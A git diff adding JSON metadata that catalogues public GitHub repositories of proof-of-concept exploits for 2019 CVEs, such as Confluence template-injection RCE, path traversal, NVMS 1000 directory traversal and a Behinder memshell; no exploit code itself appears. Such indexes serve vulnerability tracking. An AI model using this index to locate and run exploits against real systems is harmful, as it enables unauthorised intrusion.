"user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bdunlap9\/CVE-2019-19842", + "description": "PoC", + "fork": false, + "created_at": "2024-10-28T14:55:40Z", + "updated_at": "2024-10-29T13:17:11Z", + "pushed_at": "2024-10-29T13:17:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19844.json b/2019/CVE-2019-19844.json new file mode 100644 index 0000000000..e64ef1e087 --- /dev/null +++ b/2019/CVE-2019-19844.json @@ -0,0 +1,101 @@ +[ + { + "id": 229376107, + "name": "django_cve_2019_19844_poc", + "full_name": "ryu22e\/django_cve_2019_19844_poc", + "owner": { + "login": "ryu22e", + "id": 301892, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/301892?v=4", + "html_url": "https:\/\/github.com\/ryu22e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ryu22e\/django_cve_2019_19844_poc", + "description": "PoC for CVE-2019-19844(https:\/\/www.djangoproject.com\/weblog\/2019\/dec\/18\/security-releases\/)", + "fork": false, + "created_at": "2019-12-21T04:30:34Z", + "updated_at": "2024-08-30T17:23:17Z", + "pushed_at": "2019-12-24T12:31:47Z", + "stargazers_count": 99, + "watchers_count": 99, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-19844", + "django", + "python", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 12, + "watchers": 99, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 230083007, + "name": "django_cve201919844", + "full_name": "andripwn\/django_cve201919844", + "owner": { + "login": "andripwn", + "id": 52893492, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52893492?v=4", + "html_url": "https:\/\/github.com\/andripwn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andripwn\/django_cve201919844", + "description": "PoC for CVE-2019-19844 ( https:\/\/www.djangoproject.com\/weblog\/2019\/dec\/18\/security-releases\/ )", + "fork": false, + "created_at": "2019-12-25T10:05:48Z", + "updated_at": "2024-08-12T19:56:01Z", + "pushed_at": "2020-09-20T16:23:45Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 234739158, + "name": "CVE_2019_19844", + "full_name": "0xsha\/CVE_2019_19844", + "owner": { + "login": "0xsha", + "id": 54356171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54356171?v=4", + "html_url": "https:\/\/github.com\/0xsha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xsha\/CVE_2019_19844", + "description": "CVE-2019-19844 Docker Edition", + "fork": false, + "created_at": "2020-01-18T13:32:21Z", + "updated_at": "2024-08-12T19:56:46Z", + "pushed_at": "2021-09-22T18:25:53Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19871.json b/2019/CVE-2019-19871.json new file mode 100644 index 0000000000..c19129ae0f --- /dev/null +++ b/2019/CVE-2019-19871.json @@ -0,0 +1,33 @@ +[ + { + "id": 235170660, + "name": "CVE-2019-19871-AuditGuide", + "full_name": "VDISEC\/CVE-2019-19871-AuditGuide", + "owner": { + "login": "VDISEC", + "id": 29587802, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29587802?v=4", + "html_url": "https:\/\/github.com\/VDISEC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VDISEC\/CVE-2019-19871-AuditGuide", + "description": "Audit Guide for the Citrix ADC Vulnerability CVE-2019-19871. Collected from multiple sources and threat assessments. Will be updated as new methods come up.", + "fork": false, + "created_at": "2020-01-20T18:34:51Z", + "updated_at": "2021-05-12T19:42:30Z", + "pushed_at": "2020-01-23T20:30:32Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19905.json b/2019/CVE-2019-19905.json new file mode 100644 index 0000000000..f5d8cc7e0a --- /dev/null +++ b/2019/CVE-2019-19905.json @@ -0,0 +1,33 @@ +[ + { + "id": 245700108, + "name": "CVE-2019-19905", + "full_name": "dpmdpm2\/CVE-2019-19905", + "owner": { + "login": "dpmdpm2", + "id": 60997239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60997239?v=4", + "html_url": "https:\/\/github.com\/dpmdpm2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dpmdpm2\/CVE-2019-19905", + "description": null, + "fork": false, + "created_at": "2020-03-07T20:23:04Z", + "updated_at": "2020-03-07T20:27:08Z", + "pushed_at": "2020-03-07T20:27:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19919.json b/2019/CVE-2019-19919.json new file mode 100644 index 0000000000..6c8317b41b --- /dev/null +++ b/2019/CVE-2019-19919.json @@ -0,0 +1,33 @@ +[ + { + "id": 875201006, + "name": "CVE-2019-19919", + "full_name": "fazilbaig1\/CVE-2019-19919", + "owner": { + "login": "fazilbaig1", + "id": 25384256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25384256?v=4", + "html_url": "https:\/\/github.com\/fazilbaig1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fazilbaig1\/CVE-2019-19919", + "description": "Handlebars Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Vulnerability", + "fork": false, + "created_at": "2024-10-19T11:05:45Z", + "updated_at": "2024-10-20T03:01:18Z", + "pushed_at": "2024-10-19T11:19:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19945.json b/2019/CVE-2019-19945.json new file mode 100644 index 0000000000..6a49f082ac --- /dev/null +++ b/2019/CVE-2019-19945.json @@ -0,0 +1,33 @@ +[ + { + "id": 505768547, + "name": "CVE-2019-19945_Test", + "full_name": "delicateByte\/CVE-2019-19945_Test", + "owner": { + "login": "delicateByte", + "id": 73224962, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73224962?v=4", + "html_url": "https:\/\/github.com\/delicateByte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/delicateByte\/CVE-2019-19945_Test", + "description": null, + "fork": false, + "created_at": "2022-06-21T09:07:10Z", + "updated_at": "2022-06-27T14:55:44Z", + "pushed_at": "2022-06-27T15:15:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-20059.json b/2019/CVE-2019-20059.json new file mode 100644 index 0000000000..c2a1ec4262 --- /dev/null +++ b/2019/CVE-2019-20059.json @@ -0,0 +1,33 @@ +[ + { + "id": 244965126, + "name": "CVE-2019-20059", + "full_name": "cve-vuln\/CVE-2019-20059", + "owner": { + "login": "cve-vuln", + "id": 61799154, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61799154?v=4", + "html_url": "https:\/\/github.com\/cve-vuln", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cve-vuln\/CVE-2019-20059", + "description": "Yetishare SQL Injection in sSortDir_0 parameter - v3.5.2 - v4.5.4. Apart from an admin being able to exploit this, it could also be used in a CSRF attack to trick an admin user into running malicious queries.", + "fork": false, + "created_at": "2020-03-04T17:41:52Z", + "updated_at": "2020-03-04T17:41:55Z", + "pushed_at": "2020-02-07T17:48:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-20085.json b/2019/CVE-2019-20085.json new file mode 100644 index 0000000000..14d23b2a3b --- /dev/null +++ b/2019/CVE-2019-20085.json @@ -0,0 +1,33 @@ +[ + { + "id": 255883383, + "name": "NVMS1000-Exploit", + "full_name": "AleDiBen\/NVMS1000-Exploit", + "owner": { + "login": "AleDiBen", + "id": 18688115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18688115?v=4", + "html_url": "https:\/\/github.com\/AleDiBen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AleDiBen\/NVMS1000-Exploit", + "description": "NVMS 1000 - Directory Traversal Attack Exploit for CVE-2019-20085", + "fork": false, + "created_at": "2020-04-15T10:31:14Z", + "updated_at": "2024-10-25T14:19:01Z", + "pushed_at": "2024-10-25T14:18:57Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-20197.json b/2019/CVE-2019-20197.json new file mode 100644 index 0000000000..87f47ea012 --- /dev/null +++ b/2019/CVE-2019-20197.json @@ -0,0 +1,64 @@ +[ + { + "id": 232512469, + "name": "CVE-2019-20197", + "full_name": "lp008\/CVE-2019-20197", + "owner": { + "login": "lp008", + "id": 11436275, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11436275?v=4", + "html_url": "https:\/\/github.com\/lp008", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lp008\/CVE-2019-20197", + "description": "CVE-2019-20197", + "fork": false, + "created_at": "2020-01-08T08:11:58Z", + "updated_at": "2020-01-08T08:20:44Z", + "pushed_at": "2020-01-08T08:19:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 232513269, + "name": "CVE-2019-20197", + "full_name": "jas502n\/CVE-2019-20197", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-20197", + "description": "Nagios XI远程命令执行漏洞 \/confluence\/WEB-INF\/)文件读取漏洞", + "fork": false, + "created_at": "2019-08-30T07:44:17Z", + "updated_at": "2023-02-28T01:23:50Z", + "pushed_at": "2019-09-02T13:37:00Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 17, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-3396.json b/2019/CVE-2019-3396.json new file mode 100644 index 0000000000..1ef023b8a7 --- /dev/null +++ b/2019/CVE-2019-3396.json @@ -0,0 +1,596 @@ +[ + { + "id": 180277406, + "name": "CVE-2019-3396", + "full_name": "dothanthitiendiettiende\/CVE-2019-3396", + "owner": { + "login": "dothanthitiendiettiende", + "id": 29480786, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29480786?v=4", + "html_url": "https:\/\/github.com\/dothanthitiendiettiende", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dothanthitiendiettiende\/CVE-2019-3396", + "description": "Confluence Widget Connector RCE", + "fork": false, + "created_at": "2019-04-09T03:26:06Z", + "updated_at": "2019-04-09T11:34:37Z", + "pushed_at": "2019-04-09T03:25:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 180298650, + "name": "CVE-2019-3396", + "full_name": "x-f1v3\/CVE-2019-3396", + "owner": { + "login": "x-f1v3", + "id": 26115807, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26115807?v=4", + "html_url": "https:\/\/github.com\/x-f1v3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/x-f1v3\/CVE-2019-3396", + "description": "Confluence Widget Connector path traversal (CVE-2019-3396)", + "fork": false, + "created_at": "2019-04-09T06:20:51Z", + "updated_at": "2020-09-20T02:27:50Z", + "pushed_at": "2019-10-04T22:25:03Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 22, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 180347878, + "name": "CVE-2019-3396", + "full_name": "xiaoshuier\/CVE-2019-3396", + "owner": { + "login": "xiaoshuier", + "id": 28529214, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28529214?v=4", + "html_url": "https:\/\/github.com\/xiaoshuier", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiaoshuier\/CVE-2019-3396", + "description": null, + "fork": false, + "created_at": "2019-04-09T11:01:41Z", + "updated_at": "2020-07-11T12:06:45Z", + "pushed_at": "2019-04-09T10:59:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 180483984, + "name": "CVE-2019-3396_EXP", + "full_name": "Yt1g3r\/CVE-2019-3396_EXP", + "owner": { + "login": "Yt1g3r", + "id": 12625147, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12625147?v=4", + "html_url": "https:\/\/github.com\/Yt1g3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yt1g3r\/CVE-2019-3396_EXP", + "description": "CVE-2019-3396 confluence SSTI RCE", + "fork": false, + "created_at": "2019-04-10T02:15:47Z", + "updated_at": "2024-09-12T12:36:30Z", + "pushed_at": "2020-10-01T08:40:07Z", + "stargazers_count": 173, + "watchers_count": 173, + "has_discussions": false, + "forks_count": 66, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "confluence", + "cve-2019-3396", + "exp", + "ssti" + ], + "visibility": "public", + "forks": 66, + "watchers": 173, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 180484942, + "name": "CVE-2019-3396", + "full_name": "jas502n\/CVE-2019-3396", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-3396", + "description": "Confluence 未授权 RCE (CVE-2019-3396) 漏洞", + "fork": false, + "created_at": "2019-04-10T02:22:24Z", + "updated_at": "2024-10-07T12:00:21Z", + "pushed_at": "2019-11-01T14:33:21Z", + "stargazers_count": 145, + "watchers_count": 145, + "has_discussions": false, + "forks_count": 59, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 59, + "watchers": 145, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 180485239, + "name": "CVE-2019-3396", + "full_name": "pyn3rd\/CVE-2019-3396", + "owner": { + "login": "pyn3rd", + "id": 41412951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41412951?v=4", + "html_url": "https:\/\/github.com\/pyn3rd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pyn3rd\/CVE-2019-3396", + "description": "Confluence Widget Connector RCE", + "fork": false, + "created_at": "2019-04-10T02:24:29Z", + "updated_at": "2024-10-07T12:00:19Z", + "pushed_at": "2019-04-10T02:26:45Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 39, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 180528467, + "name": "CVE-2019-3396", + "full_name": "s1xg0d\/CVE-2019-3396", + "owner": { + "login": "s1xg0d", + "id": 8321329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8321329?v=4", + "html_url": "https:\/\/github.com\/s1xg0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s1xg0d\/CVE-2019-3396", + "description": null, + "fork": false, + "created_at": "2019-04-10T07:39:42Z", + "updated_at": "2019-05-13T11:39:51Z", + "pushed_at": "2019-05-13T11:39:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 180627265, + "name": "CVE-2019-3396", + "full_name": "quanpt103\/CVE-2019-3396", + "owner": { + "login": "quanpt103", + "id": 45188297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45188297?v=4", + "html_url": "https:\/\/github.com\/quanpt103", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/quanpt103\/CVE-2019-3396", + "description": "Confluence Widget Connector RCE - ptquan", + "fork": false, + "created_at": "2019-04-10T17:05:10Z", + "updated_at": "2019-04-10T17:06:24Z", + "pushed_at": "2019-04-10T17:06:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 183862751, + "name": "confluence_CVE-2019-3396", + "full_name": "vntest11\/confluence_CVE-2019-3396", + "owner": { + "login": "vntest11", + "id": 46453327, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46453327?v=4", + "html_url": "https:\/\/github.com\/vntest11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vntest11\/confluence_CVE-2019-3396", + "description": " Confluence Widget Connector path traversal (CVE-2019-3396)", + "fork": false, + "created_at": "2019-04-28T05:59:21Z", + "updated_at": "2019-04-28T06:40:38Z", + "pushed_at": "2019-04-28T06:40:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 194643451, + "name": "test1", + "full_name": "tanw923\/test1", + "owner": { + "login": "tanw923", + "id": 49778932, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49778932?v=4", + "html_url": "https:\/\/github.com\/tanw923", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tanw923\/test1", + "description": "https:\/\/github.com\/Yt1g3r\/CVE-2019-3396_EXP.git", + "fork": false, + "created_at": "2019-07-01T09:35:17Z", + "updated_at": "2019-07-02T15:24:32Z", + "pushed_at": "2019-07-02T15:24:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 203499284, + "name": "CVE-2019-3396-confluence-poc", + "full_name": "skommando\/CVE-2019-3396-confluence-poc", + "owner": { + "login": "skommando", + "id": 22767889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22767889?v=4", + "html_url": "https:\/\/github.com\/skommando", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skommando\/CVE-2019-3396-confluence-poc", + "description": "CVE-2019-3396 漏洞验证txt与模板文件。", + "fork": false, + "created_at": "2019-08-21T03:30:53Z", + "updated_at": "2019-08-21T06:10:16Z", + "pushed_at": "2019-08-21T06:09:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 218002069, + "name": "CVE-2019-3396TEST", + "full_name": "JonathanZhou348\/CVE-2019-3396TEST", + "owner": { + "login": "JonathanZhou348", + "id": 30709551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30709551?v=4", + "html_url": "https:\/\/github.com\/JonathanZhou348", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JonathanZhou348\/CVE-2019-3396TEST", + "description": "TEST", + "fork": false, + "created_at": "2019-10-28T08:43:40Z", + "updated_at": "2020-02-21T12:17:57Z", + "pushed_at": "2020-02-21T12:17:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 223076925, + "name": "CVE-2019-3396", + "full_name": "am6539\/CVE-2019-3396", + "owner": { + "login": "am6539", + "id": 19407692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19407692?v=4", + "html_url": "https:\/\/github.com\/am6539", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/am6539\/CVE-2019-3396", + "description": null, + "fork": false, + "created_at": "2019-11-21T03:07:08Z", + "updated_at": "2019-11-21T03:18:13Z", + "pushed_at": "2019-11-21T03:18:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 227548353, + "name": "CVE-2019-3396", + "full_name": "W2Ning\/CVE-2019-3396", + "owner": { + "login": "W2Ning", + "id": 33406415, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33406415?v=4", + "html_url": "https:\/\/github.com\/W2Ning", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W2Ning\/CVE-2019-3396", + "description": "For test", + "fork": false, + "created_at": "2019-12-12T07:40:22Z", + "updated_at": "2019-12-13T08:59:05Z", + "pushed_at": "2019-12-13T08:59:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 313479621, + "name": "cve-2019-3396", + "full_name": "yuehanked\/cve-2019-3396", + "owner": { + "login": "yuehanked", + "id": 74577427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74577427?v=4", + "html_url": "https:\/\/github.com\/yuehanked", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuehanked\/cve-2019-3396", + "description": "windows.vm", + "fork": false, + "created_at": "2020-11-17T02:01:48Z", + "updated_at": "2020-11-17T02:02:54Z", + "pushed_at": "2020-11-17T02:02:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 335007063, + "name": "cve-2019-3396", + "full_name": "0xNinjaCyclone\/cve-2019-3396", + "owner": { + "login": "0xNinjaCyclone", + "id": 66518921, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66518921?v=4", + "html_url": "https:\/\/github.com\/0xNinjaCyclone", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xNinjaCyclone\/cve-2019-3396", + "description": null, + "fork": false, + "created_at": "2021-02-01T16:10:27Z", + "updated_at": "2022-01-10T18:27:07Z", + "pushed_at": "2022-01-10T13:48:58Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 336327102, + "name": "CVE-2019-3396_Confluence", + "full_name": "46o60\/CVE-2019-3396_Confluence", + "owner": { + "login": "46o60", + "id": 29371699, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29371699?v=4", + "html_url": "https:\/\/github.com\/46o60", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/46o60\/CVE-2019-3396_Confluence", + "description": null, + "fork": false, + "created_at": "2021-02-05T16:31:30Z", + "updated_at": "2021-02-05T16:59:50Z", + "pushed_at": "2021-02-05T16:48:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 363303498, + "name": "cve-2019-3396", + "full_name": "PetrusViet\/cve-2019-3396", + "owner": { + "login": "PetrusViet", + "id": 63145078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63145078?v=4", + "html_url": "https:\/\/github.com\/PetrusViet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PetrusViet\/cve-2019-3396", + "description": "Confluence unauthorize template injection", + "fork": false, + "created_at": "2021-05-01T02:10:04Z", + "updated_at": "2024-08-12T20:12:37Z", + "pushed_at": "2021-05-04T04:34:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 803701507, + "name": "CVE-2019-3396-Memshell-for-Behinder", + "full_name": "Avento\/CVE-2019-3396-Memshell-for-Behinder", + "owner": { + "login": "Avento", + "id": 13798539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13798539?v=4", + "html_url": "https:\/\/github.com\/Avento", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Avento\/CVE-2019-3396-Memshell-for-Behinder", + "description": "CVE-2019-3396 Memshell for Behinder", + "fork": false, + "created_at": "2024-05-21T08:20:01Z", + "updated_at": "2024-06-05T07:23:10Z", + "pushed_at": "2024-05-21T08:24:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-3398.json b/2019/CVE-2019-3398.json new file mode 100644 index 0000000000..90b97c4320 --- /dev/null +++ b/2019/CVE-2019-3398.json @@ -0,0 +1,64 @@ +[ + { + "id": 182378884, + "name": "cve-2019-3398", + "full_name": "superevr\/cve-2019-3398", + "owner": { + "login": "superevr", + "id": 2046483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2046483?v=4", + "html_url": "https:\/\/github.com\/superevr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/superevr\/cve-2019-3398", + "description": "Python script to exploit confluence path traversal vulnerability cve-2019-3398", + "fork": false, + "created_at": "2019-04-20T08:07:49Z", + "updated_at": "2022-03-23T06:02:00Z", + "pushed_at": "2019-06-06T21:17:09Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 749339307, + "name": "CVE-2019-3398", + "full_name": "132231g\/CVE-2019-3398", + "owner": { + "login": "132231g", + "id": 49609245, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49609245?v=4", + "html_url": "https:\/\/github.com\/132231g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/132231g\/CVE-2019-3398", + "description": null, + "fork": false, + "created_at": "2024-01-28T09:40:35Z", + "updated_at": "2024-01-28T09:40:35Z", + "pushed_at": 